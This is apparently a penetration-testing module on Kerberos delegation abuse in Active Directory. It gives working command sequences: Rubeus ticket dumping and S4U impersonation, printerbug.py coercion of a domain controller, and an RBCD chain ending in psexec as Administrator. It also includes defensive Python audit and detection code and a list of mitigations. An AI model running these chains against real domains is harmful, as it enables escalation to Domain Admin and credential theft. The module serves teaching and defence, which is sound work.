Kerberos delegation lets a service act on behalf of a user when talking to another service. A web frontend authenticates the user and needs to query a backend DB as that user; delegation makes that work without the user authenticating to the DB directly. It’s a useful feature. It’s also one of the most abused paths to Domain Admin in modern engagements.
The three delegation types
- Unconstrained: service can act as user for ANY other service. Attacker who compromises an unconstrained-delegation server gets TGT of every user who authenticates to it.
- Constrained: service can act as user for SPECIFIC other services. Abuse via S4U2Self + S4U2Proxy chain.
- Resource-Based Constrained Delegation (RBCD): introduced with Windows Server 2012. The target resource specifies which accounts can delegate to it. This changed the attack surface significantly.
Unconstrained delegation abuse
When a computer has unconstrained delegation, any user who authenticates to it has their TGT cached on that computer (so it can be used to authenticate onwards). This is a classic massive risk.
# Find unconstrained delegation computers
Get-DomainComputer -Unconstrained -Properties Name, DNSHostName
# If attacker compromises SERVER01 (unconstrained delegation enabled)
# Wait for privileged user to authenticate to SERVER01
# (Coerce if needed: PetitPotam, PrinterBug to make DC authenticate)
# Extract cached TGT
Rubeus triage # shows cached tickets
Rubeus dump /luid:0x1234abcd # extracts specific ticket
Rubeus ptt /ticket:BASE64TICKET # use the ticket
# Coercion via PrinterBug
# Tool: SpoolSample.exe or printerbug.py
python3 printerbug.py corp/user:pass@DC01.corp.local SERVER01.corp.local
# DC01 authenticates to SERVER01 → DC$ TGT cached → DCSync possible
Constrained delegation abuse (S4U)
If you control a service account configured with constrained delegation to a target service, you can impersonate any user to that service.
# Enumerate constrained delegation
Get-DomainUser -TrustedToAuth -Properties samaccountname, msDS-AllowedToDelegateTo
Get-DomainComputer -TrustedToAuth -Properties name, msDS-AllowedToDelegateTo
# If SVC_WEB has delegation to HTTP/backend.corp.local
# and you control SVC_WEB credentials:
Rubeus s4u /user:SVC_WEB /rc4:NTLMHASH /impersonateuser:Administrator \
/msdsspn:HTTP/backend.corp.local /altservice:cifs /ptt
# Now authenticated as Administrator with a CIFS ticket to backend
# Even though msDS-AllowedToDelegateTo specified HTTP, altservice trick
# allows CIFS too (same underlying computer account target)
Resource-Based Constrained Delegation (RBCD)
Classic delegation: trust flows from source (attribute on source). RBCD: trust flows from target (target lists allowed delegators via msDS-AllowedToActOnBehalfOfOtherIdentity). Attack: if you can write to that attribute on a target, you control who can delegate to it.
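Because msDS-AllowedToActOnBehalfOfOtherIdentity is an opaque binary security descriptor, auditing RBCD means decoding it to see which principals the target actually trusts. The following is an added example, not code from this module or from any tool it names: a minimal MS-DTYP self-relative security descriptor decoder that lists the ACCESS_ALLOWED ACEs in the DACL and compares them with an approved list. The builder exists only to construct offline test input; the SIDs, the approved set and the access mask are constructed values, and the layout assumes the attribute holds exactly one self-relative descriptor as written by the usual tooling.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity for an RBCD audit.

Added example (not the module's or any tool's own code). The attribute is a binary
self-relative security descriptor; the DACL's ACCESS_ALLOWED ACEs name the
principals allowed to delegate to the object. Layout per MS-DTYP; the sample SIDs
and the access mask below are constructed.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID (revision, count, 48-bit authority, subauthorities)."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError(f"not a SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(s.to_bytes(4, "little") for s in subs))


def sid_from_bytes(buf: bytes, off: int) -> tuple:
    """Parse a binary SID at offset; returns (sid string, bytes consumed)."""
    revision, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = [int.from_bytes(buf[off + 8 + 4 * i:off + 12 + 4 * i], "little") for i in range(count)]
    return "-".join(["S", str(revision), str(authority)] + [str(s) for s in subs]), 8 + 4 * count


def build_rbcd_sd(delegator_sids, owner="S-1-5-32-544") -> bytes:
    """Build a self-relative SD whose DACL allows each SID (used here only to construct input)."""
    owner_b = sid_to_bytes(owner)
    aces = b""
    for sid in delegator_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size; then access mask (constructed value) and SID.
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), 0x000F01FF) + sid_b
    # ACL header: revision 2, sbz1, size, ACE count, sbz2.
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(delegator_sids), 0) + aces
    off_owner = 20                       # SD header is 20 bytes
    off_group = off_owner + len(owner_b)
    off_dacl = off_group + len(owner_b)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner_b + owner_b + acl


def allowed_delegators(sd: bytes) -> list:
    """Return [(sid, access_mask)] for every ACCESS_ALLOWED ACE in the DACL."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1:
        raise ValueError("unsupported security descriptor revision")
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []                        # no DACL present: nobody is allowed
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    result, off = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask = struct.unpack_from("<I", sd, off + 4)[0]
            sid, _ = sid_from_bytes(sd, off + 8)
            result.append((sid, mask))
        off += ace_size                  # other ACE types are skipped by their declared size
    return result


def unexpected_delegators(sd: bytes, approved: set) -> list:
    """SIDs in the DACL that are not on the approved list: the alert condition."""
    return [sid for sid, _ in allowed_delegators(sd) if sid not in approved]


# Constructed SIDs: one approved front-end service account, one unknown principal.
APPROVED = {"S-1-5-21-1111-2222-3333-1105"}
SAMPLE_SD = build_rbcd_sd(["S-1-5-21-1111-2222-3333-1105", "S-1-5-21-1111-2222-3333-5601"])

if __name__ == "__main__":
    for sid, mask in allowed_delegators(SAMPLE_SD):
        print(f"{sid} mask=0x{mask:08x}")
    print("unexpected:", unexpected_delegators(SAMPLE_SD, APPROVED))
```

In production the input to allowed_delegators is the raw attribute value returned by an LDAP query; feeding every computer object's value through unexpected_delegators against a change-controlled approved set turns the opaque attribute into a reviewable list, and an empty approved set for a host means any non-empty result is a finding.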
# Scenario: you have GenericWrite on computer TARGET-SRV
# MachineAccountQuota default = 10, so you can create a new computer account
# Step 1: Create new computer account
python3 addcomputer.py -computer-name 'FAKE$' -computer-pass 'Pass123!' \
-dc-host dc.corp.local corp.local/alice:Password1
# Step 2: Set msDS-AllowedToActOnBehalfOfOtherIdentity on TARGET-SRV
python3 rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET-SRV$' \
-action write corp.local/alice:Password1
# Step 3: Request ticket impersonating Administrator
python3 getST.py -spn 'cifs/TARGET-SRV.corp.local' \
-impersonate Administrator \
corp.local/'FAKE$':'Pass123!'
# Step 4: Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass TARGET-SRV.corp.local
Printer Bug / PetitPotam coercion
Many delegation attacks require “make this specific machine authenticate to my controlled machine.” Coercion primitives:
- PrinterBug (MS-RPRN): spooler service. CVE-2021-34527. Triggers authentication via print job notification. Patched variants exist.
- PetitPotam (MS-EFSRPC): Encrypted File System RPC. Well-known coercion. Patched in stages.
- DFSCoerce (MS-DFSNM): DFS Namespace. Similar pattern.
- Shadow Credentials (msDS-KeyCredentialLink): 2021 technique; writing to the attribute enables cert-based logon for that user.
Real-world incidents
- Ransomware playbook: Initial foothold → BloodHound → identify delegation paths → RBCD + coercion → DA. Standard in Conti / LockBit / BlackCat operations.
- PetitPotam + ADCS ESC8: Chain became the go-to mid-engagement escalation 2021-2024. Force DC to authenticate; relay to ADCS; get DC cert; DCSync.
- Unconstrained delegation on Exchange servers: Legacy Exchange installations had unconstrained delegation by default. Any compromise of Exchange = DA TGT for anyone emailing that server.
What we find
- Servers (non-DC) with unconstrained delegation enabled → classic legacy finding
- Service accounts with constrained delegation to sensitive SPNs (DC cifs, LDAP, etc.)
- MachineAccountQuota set to default 10 (enables RBCD attacks by any user)
- Print Spooler running on DCs (PrinterBug)
- EFSRPC accessible on DCs (PetitPotam)
- ADCS web enrollment without EPA (relay target)
- Shadow credential attribute writable by non-privileged users
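The three delegation types described at the top of this module, and the first three items of the findings list above, all come down to a handful of directory attributes. The following is an added example, not code from this module or from any tool it names: an offline audit that classifies constructed directory entries by delegation type from userAccountControl, msDS-AllowedToDelegateTo and the presence of msDS-AllowedToActOnBehalfOfOtherIdentity, and reports the conditions a pentester would write up (unconstrained on a non-DC, constrained to a DC or sensitive service class, RBCD populated, privileged account still delegatable). The flag values are the standard AD ones; the sensitive service classes, DC host list, privileged account list and sample entries are assumptions.

```python
"""Audit Kerberos delegation settings from directory attributes.

Added example for this module (not the module's or any tool's own code). It runs
offline on constructed entries shaped like the attributes an LDAP query returns:
userAccountControl, msDS-AllowedToDelegateTo and whether
msDS-AllowedToActOnBehalfOfOtherIdentity is populated.
"""
from dataclasses import dataclass, field

# userAccountControl bits that govern delegation (standard AD flag values).
UF_TRUSTED_FOR_DELEGATION = 0x00080000          # unconstrained delegation
UF_NOT_DELEGATED = 0x00100000                   # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained + protocol transition (S4U2Self for any user)
UF_SERVER_TRUST_ACCOUNT = 0x00002000            # domain controller computer account

# Service classes treated as sensitive wherever they point (assumption; tune per
# environment). The module's own findings list names DC cifs and LDAP.
SENSITIVE_SERVICES = {"cifs", "ldap", "host"}


@dataclass
class Entry:
    sam: str                                   # sAMAccountName
    uac: int                                   # userAccountControl
    allowed_to_delegate_to: list = field(default_factory=list)  # msDS-AllowedToDelegateTo
    rbcd_set: bool = False                     # msDS-AllowedToActOnBehalfOfOtherIdentity non-empty


def parse_spn(spn: str):
    """Split 'class/host[:port][/instance]' into lowercase (class, host)."""
    service, _, rest = spn.partition("/")
    host = rest.split("/")[0].split(":")[0]
    return service.lower(), host.lower()


def classify(entry: Entry, dc_hosts: set, privileged: set) -> list:
    """Return the delegation findings for one entry (empty list = nothing to report)."""
    findings = []
    is_dc = bool(entry.uac & UF_SERVER_TRUST_ACCOUNT)

    # Unconstrained delegation is expected on DCs; anywhere else it is the classic
    # legacy finding (every caller's TGT gets cached on that host).
    if entry.uac & UF_TRUSTED_FOR_DELEGATION and not is_dc:
        findings.append("unconstrained delegation on non-DC")

    # Constrained delegation: report targets on DCs or with sensitive service
    # classes, and say whether protocol transition (S4U2Self) is enabled.
    if entry.allowed_to_delegate_to:
        mode = ("constrained with protocol transition"
                if entry.uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION
                else "constrained, Kerberos-only")
        for spn in entry.allowed_to_delegate_to:
            service, host = parse_spn(spn)
            if host in dc_hosts or service in SENSITIVE_SERVICES:
                findings.append(f"{mode} to sensitive target {spn}")

    # RBCD: the target itself lists who may delegate to it; any value needs review.
    if entry.rbcd_set:
        findings.append("RBCD principals configured on this object")

    # Privileged accounts should carry NOT_DELEGATED (or sit in Protected Users);
    # otherwise every delegation path above can impersonate them.
    if entry.sam.lower() in privileged and not entry.uac & UF_NOT_DELEGATED:
        findings.append("privileged account is delegatable (NOT_DELEGATED not set)")
    return findings


def audit(entries, dc_hosts, privileged) -> dict:
    """Map sAMAccountName -> findings, keeping only entries with something to report."""
    dc_hosts = {h.lower() for h in dc_hosts}
    privileged = {p.lower() for p in privileged}
    report = {}
    for entry in entries:
        found = classify(entry, dc_hosts, privileged)
        if found:
            report[entry.sam] = found
    return report


# Constructed sample directory, reusing the account names from this module.
SAMPLE_ENTRIES = [
    Entry("DC01$", 0x82000),                                   # DC: unconstrained is expected
    Entry("SERVER01$", 0x81000),                               # member server with unconstrained
    Entry("SVC_WEB", 0x1000200, ["HTTP/backend.corp.local", "cifs/DC01.corp.local"]),
    Entry("TARGET-SRV$", 0x1000, rbcd_set=True),
    Entry("Administrator", 0x200),                             # delegatable privileged account
    Entry("svc_backup", 0x100200),                             # NOT_DELEGATED set
]

if __name__ == "__main__":
    report = audit(SAMPLE_ENTRIES, {"dc01.corp.local"}, {"administrator", "svc_backup"})
    for sam, found in report.items():
        print(sam, "->", "; ".join(found))
```

The same classification works on the output of any LDAP client once the three attributes are pulled into Entry objects; the point of keeping the sensitive-service and privileged-account sets explicit is that a finding like "HTTP/backend" versus "cifs/DC01" is an environment judgement, not a property of the attribute.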
Defenses
- Disable unconstrained delegation wherever possible. Legitimate use cases are rare in 2026.
- Mark sensitive accounts ‘Account is sensitive and cannot be delegated’ (or add them to Protected Users → stronger).
- Set MachineAccountQuota to 0 for non-privileged users. Manage computer account creation via delegation groups.
- Disable Print Spooler on DCs. Non-negotiable.
- Apply PetitPotam mitigation (registry setting blocking anonymous EFSRPC).
- Apply all Windows patches for coercion vulnerabilities.
- Enable SMB signing + LDAP signing + channel binding (blocks many relay paths).
- Enable Extended Protection for Authentication on ADCS web enrollment.
- Audit msDS-AllowedToActOnBehalfOfOtherIdentity changes → alert on writes.
- Monitor for Rubeus / Impacket signatures on endpoints.
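The audit-and-alert items above (writes to msDS-AllowedToActOnBehalfOfOtherIdentity, the shadow credential attribute, constrained delegation targets, and computer account creation by ordinary users under the default MachineAccountQuota) map onto a few Windows Security events. The following is an added example, not code from this module or from any SIEM product: three detection rules run over constructed event records shaped like the EventData of 5136 (directory service object modified), 4742 (computer account changed) and 4741 (computer account created). The field names follow those events' EventData schema but are an assumption to verify against your collector, the trusted-operator list is constructed, and 5136 only fires when directory service change auditing is enabled and the object carries a matching SACL.

```python
"""Alert on delegation-related changes from Windows Security events.

Added example (not the module's or any product's own code). Events are constructed
dicts keyed by the EventData field names of the events they imitate; treat those
names as an assumption to check against your collector's schema.
"""

# Attributes whose write opens a delegation or logon path (all named in this module).
WATCHED_ATTRIBUTES = {
    "msds-allowedtoactonbehalfofotheridentity": "RBCD write",
    "msds-allowedtodelegateto": "constrained delegation target change",
    "msds-keycredentiallink": "shadow credential write",
}
# Accounts expected to create computer objects (constructed; tune per environment).
TRUSTED_OPERATORS = {"sccm_svc", "joinservice"}


def rule_directory_write(ev):
    """5136: a watched attribute was modified on a directory object."""
    attr = ev.get("AttributeLDAPDisplayName", "").lower()
    if ev.get("EventID") == 5136 and attr in WATCHED_ATTRIBUTES:
        return f"{WATCHED_ATTRIBUTES[attr]} on {ev.get('ObjectDN')} by {ev.get('SubjectUserName')}"
    return None


def rule_constrained_change(ev):
    """4742: the computer's AllowedToDelegateTo list changed ('-' means unchanged)."""
    if ev.get("EventID") == 4742 and ev.get("AllowedToDelegateTo", "-") != "-":
        return (f"msDS-AllowedToDelegateTo changed on {ev.get('TargetUserName')} "
                f"by {ev.get('SubjectUserName')}: {ev['AllowedToDelegateTo']}")
    return None


def rule_machine_account_created(ev):
    """4741: a computer account was created by someone other than a join operator."""
    if ev.get("EventID") == 4741:
        who = ev.get("SubjectUserName", "")
        if who.lower() not in TRUSTED_OPERATORS and not who.endswith("$"):
            return f"computer account {ev.get('TargetUserName')} created by non-operator {who}"
    return None


RULES = [rule_directory_write, rule_constrained_change, rule_machine_account_created]


def detect(events):
    """Run every rule over every event; return the alert strings in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed events following the RBCD scenario in this module, plus benign noise.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "alice", "TargetUserName": "FAKE$"},
    {"EventID": 5136, "SubjectUserName": "alice",
     "ObjectDN": "CN=TARGET-SRV,CN=Computers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
    {"EventID": 4742, "SubjectUserName": "sccm_svc", "TargetUserName": "WS001$",
     "AllowedToDelegateTo": "-"},                                   # benign: field unchanged
    {"EventID": 5136, "SubjectUserName": "helpdesk1",
     "ObjectDN": "CN=WS001,CN=Computers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "description"},                    # benign: unwatched attribute
    {"EventID": 4742, "SubjectUserName": "bob", "TargetUserName": "SVC-HOST$",
     "AllowedToDelegateTo": "cifs/DC01.corp.local"},
    {"EventID": 4741, "SubjectUserName": "joinservice", "TargetUserName": "WS002$"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

The two benign records show the noise the rules must tolerate: 4742 reports '-' for every field that did not change, so only a concrete value in AllowedToDelegateTo is a change, and 5136 fires for any audited attribute, so the rule keys on the attribute name rather than the event alone.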
Mindset takeaway
Delegation is necessary complexity. The abuses require specific conditions (specific attributes, specific ACL writes, specific coercion primitives). Each condition is fixable. Each is often unfixed in real environments.